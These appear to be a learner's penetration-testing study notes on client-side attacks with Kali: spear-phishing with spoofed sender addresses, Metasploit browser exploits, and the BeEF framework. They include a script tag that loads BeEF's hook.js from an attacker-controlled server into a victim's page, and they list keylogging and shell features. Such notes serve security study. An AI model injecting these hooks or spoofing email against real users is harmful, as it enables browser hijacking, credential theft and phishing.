Kali进行web渗透测试笔记(九)
文章目录
Exploiting the Client Using Attack Frameworks
- spear-phing e-mail attack:Choosing your own mail server has one distinct advantage:it allows you to spoof an e-mail address and,if the victim’s mail server does not performs reverse DNS lookups,the e-mail is sure to hit the victim’s mailbox.
- Metasploit browser exploit
Browser exploitation framework(BeEf):exploiting XSS flaws,the tool can also make web browsers attack other websites using injected JavaScript.
The BeEF attack platform can generate and deliver payloads directly to the target web browser.an attractive tool for social engineering attacks are the different types of modules,and its ability to control many web browsers at the same time using something known as a hook.
BeEF consists of two major components:
- A server application that manages the hooked clients,also known as zombies .
- A JavaScript hook that runs in the web browser of the victim
An example of a hook is shown in the following code .This code iss injected in a HTML file that is downloaded by the web browser:
<script type="text/javascript" src="http://<BeEF_server_IP>:3000/hook.js></script>"
The default username and password to log into the web interface is beef.
Some of the features and usses og the BeEF tool are listed as follows:
- Port scanner
- Key Logger
- Browsser information gathering
- Bind shell
- Network Mapping
- Metasploit integration